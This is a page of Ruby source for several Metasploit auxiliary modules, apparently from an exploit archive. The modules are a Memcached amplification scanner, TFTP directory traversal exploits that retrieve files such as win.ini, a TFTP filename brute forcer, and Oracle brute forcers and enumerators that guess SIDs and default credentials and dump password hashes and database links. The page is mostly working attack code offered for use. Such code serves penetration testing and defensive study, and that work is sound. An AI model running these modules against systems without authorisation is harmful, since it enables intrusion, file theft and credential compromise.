This Metasploit module can be used to discover Memcached servers which expose the unrestricted UDP port 11211. A basic "stats" request is executed to check if an amplification attack is possible against a third party.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Capture  include Msf::Auxiliary::UDPScanner  include Msf::Auxiliary::DRDoS  def initialize    super(      'Name'        => 'Memcached Stats Amplification Scanner',      'Description' => %q(          This module can be used to discover Memcached servers which expose the          unrestricted UDP port 11211. A basic "stats" request is executed to check          if an amplification attack is possible against a third party.      ),      'Author'      =>        [          'Marek Majkowski', # Cloudflare blog and base payload          'xistence <xistence[at]0x90.nl>', # Metasploit scanner module          'Jon Hart <jon_hart@rapid7.com>', # Metasploit scanner module        ],      'License'     => MSF_LICENSE,      'DisclosureDate' => 'Feb 27 2018',      'References'  =>          [            ['URL', 'https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/'],            ['CVE', '2018-1000115']          ]    )    register_options([      Opt::RPORT(11211)    ])  end  def build_probe    # Memcached stats probe, per https://github.com/memcached/memcached/blob/master/doc/protocol.txt    @memcached_probe ||= [      rand(2**16), # random request ID      0, # sequence number      1, # number of datagrams in this sequence      0, # reserved; must be 0      "stats\r\n"    ].pack("nnnna*")  end  def scanner_process(data, shost, sport)    # Check the response data for a "STAT" response    if data =~ /\x0d\x0aSTAT\x20/      @results[shost] ||= []      @results[shost] << data    end  end  # Called after the scan block  def scanner_postscan(batch)    @results.keys.each do |host|      response_map = { @memcached_probe => @results[host] }      report_service(        host: host,        proto: 'udp',        port: rport,        name: 'memcached'      )      peer = "#{host}:#{rport}"      vulnerable, proof = prove_amplification(response_map)      what = 'memcached stats amplification'      if vulnerable        print_good("#{peer} - Vulnerable to #{what}: #{proof}")        report_vuln(          host: host,          port: rport,          proto: 'udp',          name: what,          refs: references        )      else        vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")      end    end  endend

Memcached Stats Amplification Scanner

This Metasploit module uses a dictionary to brute force valid TFTP image names from a TFTP server.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'TFTP Brute Forcer',      'Description' => 'This module uses a dictionary to brute force valid TFTP image names from a TFTP server.',      'Author'      => 'antoine',      'License'     => BSD_LICENSE    )    register_options(      [        Opt::RPORT(69),        Opt::CHOST,        OptPath.new('DICTIONARY', [ true, 'The list of filenames',          File.join(Msf::Config.data_directory, "wordlists", "tftp.txt") ])      ])  end  def run_host(ip)    begin      # Create an unbound UDP socket if no CHOST is specified, otherwise      # create a UDP socket bound to CHOST (in order to avail of pivoting)      udp_sock = Rex::Socket::Udp.create(        {          'LocalHost' => datastore['CHOST'] || nil,          'Context'   =>            {              'Msf'        => framework,              'MsfExploit' => self,            }        }      )      add_socket(udp_sock)      fd = File.open(datastore['DICTIONARY'], 'rb')      fd.read(fd.stat.size).split("\n").each do |filename|        filename.strip!        pkt = "\x00\x01" + filename + "\x00" + "netascii" + "\x00"        udp_sock.sendto(pkt, ip, datastore['RPORT'])        resp = udp_sock.get(3)        if resp and resp.length >= 2 and resp[0, 2] == "\x00\x03"          print_good("Found #{filename} on #{ip}")          #Add Report          report_note(            :host  => ip,            :proto => 'udp',            :sname  => 'tftp',            :port  => datastore['RPORT'],            :type  => "Found #{filename}",            :data  => "Found #{filename}"          )        end      end      fd.close    rescue    ensure      udp_sock.close    end  endend

TFTP Brute Forcer

This Metasploit modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Golds TFTP service.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'           => "IpSwitch WhatsUp Gold TFTP Directory Traversal",      'Description'    => %q{          This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp        Gold's TFTP service.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Prabhu S Angadi',  # Initial discovery and poc          'sinn3r',           # Metasploit module          'juan vazquez'      # More improvements        ],      'References'     =>        [          ['OSVDB', '77455'],          ['BID', '50890'],          ['EDB', '18189'],          ['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt'],          ['CVE', '2011-4722']        ],      'DisclosureDate' => '2011-12-12'    ))    register_options(      [        Opt::RPORT(69),        OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),        OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])      ])  end  def run_host(ip)    # Prepare the filename    file_name  = "../"*10    file_name << datastore['FILENAME']    # Prepare the packet    pkt = "\x00\x01"    pkt << file_name    pkt << "\x00"    pkt << "octet"    pkt << "\x00"    # We need to reuse the same port in order to receive the data    udp_sock = Rex::Socket::Udp.create(      {        'Context' => {'Msf' => framework, 'MsfExploit'=>self}      }    )    add_socket(udp_sock)    # Send the packet to target    file_data = ''    udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])      opcode, block, data = r[0].unpack("nna*") # Parse reply      if opcode != 3 # Check opcode: 3 => Data Packet        print_error("Error retrieving file #{file_name} from #{ip}")        return      end      file_data << data      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack    end    if file_data.empty?        print_error("Error retrieving file #{file_name} from #{ip}")        return    end    udp_sock.close    # Output file if verbose    vprint_line(file_data.to_s)    # Save file to disk    path = store_loot(      'whatsupgold.tftp',      'application/octet-stream',      ip,      file_data,      datastore['FILENAME']    )    print_status("File saved in: #{path}")  end  #  # Returns an Acknowledgement  #  def tftp_ack(block=1)    pkt = "\x00\x04" # Ack    pkt << [block].pack("n") # Block Id  endend=beginRemote code execution might be unlikely with this directory traversal bug, because WRITErequests are forbidden by default, and cannot be changed.=end

IpSwitch WhatsUp Gold TFTP Directory Traversal

This Metasploit modules exploits a directory traversal vulnerability in NetDecision 4.2 TFTP service.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'           => "NetDecision 4.2 TFTP Directory Traversal",      'Description'    => %q{          This modules exploits a directory traversal vulnerability in NetDecision 4.2        TFTP service.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Rob Kraus', # Vulnerability discovery          'juan vazquez' # Metasploit module        ],      'References'     =>        [          ['CVE', '2009-1730'],          ['OSVDB', '54607'],          ['BID', '35002']        ],      'DisclosureDate' => '2009-05-16'    ))    register_options(      [        Opt::RPORT(69),        OptInt.new('DEPTH', [false, "Levels to reach base directory",1]),        OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),      ])  end  def run_host(ip)    # Configure how deep we want to traverse    depth  = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']    # Prepare the filename    file_name = "../" * depth    file_name << datastore['FILENAME']    # Prepare the packet    pkt = "\x00\x01"    pkt << file_name    pkt << "\x00"    pkt << "octet"    pkt << "\x00"    # We need to reuse the same port in order to receive the data    udp_sock = Rex::Socket::Udp.create(      {        'Context' => {'Msf' => framework, 'MsfExploit'=>self}      }    )    add_socket(udp_sock)    # Send the packet to target    file_data = ''    udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])      opcode, block, data = r[0].unpack("nna*") # Parse reply      if opcode != 3 # Check opcode: 3 => Data Packet        print_error("Error retrieving file #{file_name} from #{ip}")        return      end      file_data << data      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack    end    if file_data.empty?        print_error("Error retrieving file #{file_name} from #{ip}")        return    end    udp_sock.close    # Output file if verbose    vprint_line(file_data.to_s)    # Save file to disk    path = store_loot(      'netdecision.tftp',      'application/octet-stream',      ip,      file_data,      datastore['FILENAME']    )    print_status("File saved in: #{path}")  end  #  # Returns an Acknowledgement  #  def tftp_ack(block=1)    pkt = "\x00\x04" # Ack    pkt << [block].pack("n") # Block Id  endend

NetDecision 4.2 TFTP Directory Traversal

This Metasploit module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigans default oracle password list.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Oracle XML DB SID Discovery via Brute Force',      'Description' => %q{          This module attempts to retrieve the sid from the Oracle XML DB httpd server,          utilizing Pete Finnigan's default oracle password list.      },      'References'  =>        [          [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ],          [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'],        ],      'Author'      => [ 'nebulus' ],      'License'     => MSF_LICENSE    )    register_options(        [          OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),          Opt::RPORT(8080),        ])  end  def run_host(ip)    begin    res = send_request_raw({      'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',      'version' => '1.0',      'method'  => 'GET'    }, 5)    return if not res    if(res.code == 200)      vprint_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code}) is not password protected.")      return    elsif(res.code == 403 || res.code == 401)      print_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code})")    end    list = datastore['CSVFILE']    users = []    fd = CSV.foreach(list) do |brute|      dbuser = brute[2].downcase      dbpass = brute[3].downcase      user_pass = "#{dbuser}:#{dbpass}"      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',        'version' => '1.0',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, 10)      if( not res )        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")        next      end      if (res.code == 200)        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]        report_note(          :host => ip,          :proto  => 'tcp',          :port => datastore['RPORT'],          :type => 'SERVICE_NAME',          :data => sid,          :update => :unique_data        )        print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}")        users.push(user_pass)      else        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")      end    end #fd.each    good = false    users.each do |user_pass|      (u,p) = user_pass.split(':')      # get versions      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/PRODUCT_COMPONENT_VERSION',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          print_good("Version Information ==> as #{u}")          doc.elements.each('PRODUCT_COMPONENT_VERSION/ROW') do |e|            p = e.elements['PRODUCT'].get_text            v = e.elements['VERSION'].get_text            s = e.elements['STATUS'].get_text            report_note(              :host => datastore['RHOST'],              :sname => 'xdb',              :proto => 'tcp',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{p}#{v}",              :update => :unique_data            )            print_good("\t#{p}\t\t#{v}\t(#{s})")          end        end      end      # More version information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_REGISTRY_BANNERS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e|            next if e.elements['BANNER'] == nil            b = e.elements['BANNER'].get_text            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{b}",              :update => :unique_data            )            print_good("\t#{b}")          end        end      end      # database links      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_DB_LINKS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          print_good("Database Link Information ==> as #{u}")          doc.elements.each('ALL_DB_LINKS/ROW') do |e|            next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil)            h = e.elements['HOST'].get_text            d = e.elements['DB_LINK'].get_text            us = e.elements['USERNAME'].get_text            sid = h.to_s.scan(/$SID\s\=\s(\S+)$\)\)/)[0]            if(h.to_s.match(/^$DESCRIPTION/) )              h = h.to_s.scan(/\(HOST\s\=\s(\S+)$\(/)[0]            end            if(sid and sid != "")              print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}")              report_note(                :host => h[0],                :proto => 'tcp',                :port => datastore['RPORT'],                :sname => 'xdb',                :type => 'oracle_sid',                :data => sid,                :update => :unique_data              )            else              print_good("\tLink: #{d}\t#{us}\@#{h}")            end          end        end      end      # get users      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/DBA_USERS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc = REXML::Document.new(res.body)        print_good("Username/Hashes on #{ip}:#{datastore['RPORT']} ==> as #{u}")        doc.elements.each('DBA_USERS/ROW') do |user|          us = user.elements['USERNAME'].get_text          h = user.elements['PASSWORD'].get_text          as = user.elements['ACCOUNT_STATUS'].get_text          print_good("\t#{us}:#{h}:#{as}")          good = true          if(as.to_s == "OPEN")            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Active Account #{u}:#{h}:#{as}",              :update => :unique_data            )          else            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Disabled Account #{u}:#{h}:#{as}",              :update => :unique_data            )          end        end      end      # get password information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/USER_PASSWORD_LIMITS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc = REXML::Document.new(res.body)        print_good("Password Policy ==> as #{u}")        fla=plit=pgt=prt=prm=plot=''        doc.elements.each('USER_PASSWORD_LIMITS/ROW') do |e|          next if e.elements['RESOURCE_NAME'] == nil          case            when(e.elements['RESOURCE_NAME'].get_text == 'FAILED_LOGIN_ATTEMPTS')              fla = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LIFE_TIME')              plit = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_TIME')              prt = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_REUSE_MAX')              prm = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_LOCK_TIME')              plot = e.elements['LIMIT'].get_text            when(e.elements['RESOURCE_NAME'].get_text == 'PASSWORD_GRACE_TIME')              pgt = e.elements['LIMIT'].get_text          end        end        print_good(          "\tFailed Login Attempts: #{fla}\n\t" +          "Password Life Time: #{plit}\n\t" +          "Password Reuse Time: #{prt}\n\t" +          "Password Reuse Max: #{prm}\n\t" +          "Password Lock Time: #{plot}\n\t" +          "Password Grace Time: #{pgt}"        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Maximum Reuse Time: #{prm}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Reuse Time: #{prt}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Password Life Time: #{plit}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Fail Logins Permitted: #{fla}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Lockout Time: #{plot}",          :update => :unique_data        )        report_note(          :host => datastore['RHOST'],          :proto => 'tcp',          :sname => 'xdb',          :port => datastore['RPORT'],          :type => 'ORA_ENUM',          :data => "Account Password Grace Time: #{pgt}",          :update => :unique_data        )      end      break if good    end # users.each    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

Oracle XML DB SID Discovery Via Brute Force

This Metasploit module attempts to bruteforce the SID on the Oracle application server iSQL*Plus login pages. It does this by testing Oracle error responses returned in the HTTP response. Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error. Works against Oracle 9.2, 10.1 and 10.2 iSQL*Plus. This Metasploit module will attempt to fingerprint the version and automatically select the correct POST request.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'Oracle iSQLPlus SID Check',      'Description' => %q{        This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus        login pages.  It does this by testing Oracle error responses returned in the HTTP response.        Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error.        Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus.  This module will attempt to        fingerprint the version and automatically select the correct POST request.      },      'References'  =>      [        [ 'URL', 'https://blog.carnal0wnage.com/' ],      ],      'Author'      => [ 'CG', 'todb' ],      'License'     => MSF_LICENSE      )      register_options([        Opt::RPORT(5560),        OptString.new('URI', [ true, 'Oracle iSQLPlus path', '/isqlplus/']),        OptString.new('SID', [ false, 'A single SID to test']),        OptPath.new('SIDFILE', [ false, 'A file containing a list of SIDs', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),        OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 30])      ])      deregister_options(        "RHOST", "USERNAME", "PASSWORD", "USER_FILE", "PASS_FILE", "USERPASS_FILE",        "BLANK_PASSWORDS", "USER_AS_PASS", "REMOVE_USER_FILE", "REMOVE_PASS_FILE",        "BRUTEFORCE_SPEED" # Slow as heck anyway      )  end  def sid_file    datastore['SIDFILE']  end  def hostport    [target_host,rport].join(":")  end  def uri    datastore['URI'] || "/isqlplus/"  end  def timeout    (datastore['TIMEOUT'] || 30).to_i  end  def msg    msg = "#{hostport} - Oracle iSQL*Plus -"  end  def run_host(ip)    oracle_ver = get_oracle_version(ip)    if not check_oracle_version(oracle_ver)      print_error "#{msg} Unknown Oracle version, skipping."      return    end    begin      print_status("#{msg} Starting SID check")      sid_data.each do |sid|        guess = check_oracle_sid(ip,oracle_ver,sid)        return if guess and datastore['STOP_ON_SUCCESS']      end      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e        print_error "#{msg} Cannot connect"      rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e        print_error e.message    end  end  def get_oracle_version(ip)    begin      res = send_request_cgi({        'version' => '1.1',        'uri'     => uri,        'method'  => 'GET',      }, timeout)      oracle_ver = nil      if (res.nil?)        print_error("#{msg} no response")      elsif (res.code == 200)        print_status("#{msg} Received an HTTP #{res.code}")        oracle_ver = detect_oracle_version(res)      elsif (res.code == 404)        print_error("#{msg} Received an HTTP 404, check URIPATH")      elsif (res.code == 302)        print_error("#{msg} Received an HTTP 302 to #{res.headers['Location']}")      else        print_error("#{msg} Received an HTTP #{res.code}")      end      return oracle_ver    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e      print_error "#{msg} Cannot connect"    end  end  def detect_oracle_version(res)    m = res.body.match(/iSQL\*Plus Release (9\.0|9\.1|9\.2|10\.1|10\.2)/)    oracle_ver = nil    oracle_ver = 10 if m[1] && m[1] =~ /10/      oracle_ver = m[1].to_f if m[1] && m[1] =~ /9\.[012]/      if oracle_ver        print_status("#{msg} Detected Oracle version #{oracle_ver}")        print_status("#{msg} SID detection for iSQL*Plus 10.1 may be unreliable") if oracle_ver == 10.1      else        print_error("#{msg} Unknown Oracle version detected.")      end    return oracle_ver  end  def check_oracle_version(ver)    [9.0,9.1,9.2,10].include? ver  end  def build_post_request(ver,sid)    post_request = nil    case ver    when 9.0      post_request = "action=logon&sqlcmd=&sqlparms=&username=scott&password=tiger&sid=#{sid.strip}&privilege=&Log+In=%B5%C7%C2%BC"    when 9.1      post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"    when 9.2      post_request = "action=logon&username=a&password=a&sid=#{sid.strip}&login=Login"    when 10      post_request = "username=a&password=a&connectID=#{sid.strip}&report=&script=&dynamic=&type=&action=&variables=&event=login"    end    return post_request  end  def parse_isqlplus_response(res,sid)    guess = false    if (res.nil?)      print_error("#{msg} No response")    elsif (res.code == 200)      if (res.body =~ /ORA-01017:/ or res.body =~ /ORA-28273:/)        if sid.nil? || sid.empty?          print_good("#{msg} Received ORA-01017 on a blank SID -- SIDs are not enforced upon login.")        else          print_good("#{msg} Received ORA-01017, probable correct SID '#{sid.strip}'")        end        guess = true      elsif (res.body =~ /(ORA-12170):/ or res.body =~ /(ORA-12154):/ or res.body =~ /(ORA-12162):/)        vprint_status("#{msg} Incorrect SID: '#{sid.strip}' (got error code #{$1})")      elsif res.body =~ /(ORA-12541):/        print_status("#{msg} Possible correct SID, but got ORA-12541: No Listener error.")        guess = true      else        print_status("#{msg} Received an unknown error") # Should say what the error was      end    elsif (res.code == 404)      print_status("#{msg} Received an HTTP 404, check URIPATH")    elsif (res.code == 302)      print_status("#{msg} Received an HTTP 302 redirect to #{res.headers['Location']}")    else      print_status("#{msg} Received an unexpected response: #{res.code}")    end    report_isqlplus_service(target_host,res) if res    return guess  end  def report_isqlplus_service(ip,res)    sname = datastore['SSL'] ? 'https' : 'http'    report_service(      :host => ip,      :proto => 'tcp',      :port => rport,      :name => sname,      :info => res.headers["Server"].to_s.strip    )  end  def report_oracle_sid(ip,sid)    report_note(      :host => ip,      :proto => 'tcp',      :port => rport,      :type => "oracle.sid",      :data => ((sid.nil? || sid.empty?) ? "*BLANK*" : sid),      :update => :unique_data    )  end  def sid_data    if datastore['SID'] and not datastore['SID'].empty?      [datastore['SID']]    elsif sid_file and ::File.readable? sid_file      ::File.open(sid_file,"rb") {|f| f.read f.stat.size}.each_line.map {|x| x.strip.upcase}.uniq    else      raise ArugmentError, "Cannot read file '#{sid_file}'"    end  end  def check_oracle_sid(ip,oracle_ver,sid)    post_request = build_post_request(oracle_ver,sid)    vprint_status "#{msg} Trying SID '#{sid}', waiting for response..."    res = send_request_cgi({      'version' => '1.1',      'uri'     => uri,      'method'  => 'POST',      'data'   => post_request,      'headers' =>      {        'Referer' => "http://#{ip}:#{rport}#{uri}"      }    }, timeout)    guess = parse_isqlplus_response(res,sid)    report_oracle_sid(ip,sid) if guess    return guess  endend

Oracle ISQLPlus SID Check

This Metasploit module uses a list of well known default authentication credentials to discover easily guessed accounts.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'csv'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::ORACLE  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle Account Discovery',      'Description'    => %q{        This module uses a list of well known default authentication credentials        to discover easily guessed accounts.      },      'Author'         => [ 'MC' ],      'License'        => MSF_LICENSE,      'References'     =>        [          [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],          [ 'URL', 'https://seclists.org/fulldisclosure/2009/Oct/261' ],        ],      'DisclosureDate' => '2008-11-20'))      register_options(        [          OptPath.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),        ])      deregister_options('DBUSER','DBPASS')  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: Time.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL    }.merge(service_data)    create_credential_login(login_data)  end  def run    return if not check_dependencies    list = datastore['CSVFILE']    print_status("Starting brute force on #{datastore['RHOST']}:#{datastore['RPORT']}...")    fd = CSV.foreach(list) do |brute|      datastore['DBUSER'] = brute[2].downcase      datastore['DBPASS'] = brute[3].downcase      begin        connect        disconnect      rescue ::OCIError => e        if e.to_s =~ /^ORA-12170:\s/          print_error("#{datastore['RHOST']}:#{datastore['RPORT']} Connection timed out")          break        else          vprint_error("#{datastore['RHOST']}:#{datastore['RPORT']} - LOGIN FAILED: #{datastore['DBUSER']}: #{e.to_s})")        end      else        report_cred(          ip: datastore['RHOST'],          port: datastore['RPORT'],          service_name: 'oracle',          user: "#{datastore['SID']}/#{datastore['DBUSER']}",          password: datastore['DBPASS']        )        print_good("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}")      end    end  endend

Oracle Account Discovery

This Metasploit module simply queries the TNS listener for the Oracle SID. With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::TNS  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'Oracle TNS Listener SID Enumeration',      'Description'    => %q{        This module simply queries the TNS listener for the Oracle SID.        With Oracle 9.2.0.8 and above the listener will be protected and        the SID will have to be bruteforced or guessed.      },      'Author'         => [ 'CG', 'MC' ],      'License'        => MSF_LICENSE,      'DisclosureDate' => '2009-01-07'    ))    register_options(      [        Opt::RPORT(1521)      ])  end  def run_host(ip)    begin      connect      pkt = tns_packet("(CONNECT_DATA=(COMMAND=STATUS))")      sock.put(pkt)      select(nil,nil,nil,0.5)      data = sock.get_once        if ( data and data =~ /ERROR_STACK/ )          print_error("TNS listener protected for #{ip}...")        else          if(not data)            print_error("#{ip} Connection but no data")          else            sid = data.scan(/INSTANCE_NAME=([^\)]+)/)              sid.uniq.each do |s|                report_note(                  :host   => ip,                  :port  => rport,                  :type   => "oracle_sid",                  :data   => "PORT=#{rport}, SID=#{s}",                  :update  => :unique_data                )                print_good("Identified SID for #{ip}:#{rport} #{s}")              end            service_name = data.scan(/SERVICE_NAME=([^\)]+)/)              service_name.uniq.each do |s|                report_note(                  :host   => ip,                  :port  => rport,                  :type   => "oracle_service_name",                  :data   => "PORT=#{rport}, SERVICE_NAME=#{s}",                  :update  => :unique_data                )                print_status("Identified SERVICE_NAME for #{ip}:#{rport} #{s}")              end          end        end      disconnect    rescue ::Rex::ConnectionError    rescue ::Errno::EPIPE    end  endend

Oracle TNS Listener SID Enumeration

This Metasploit module checks the server for vulnerabilities like TNS Poison. Module sends a server a packet with command to register new TNS Listener and checks for a response indicating an error. If the registration is errored, the target is not vulnerable. Otherwise, the target is vulnerable to malicious registrations.

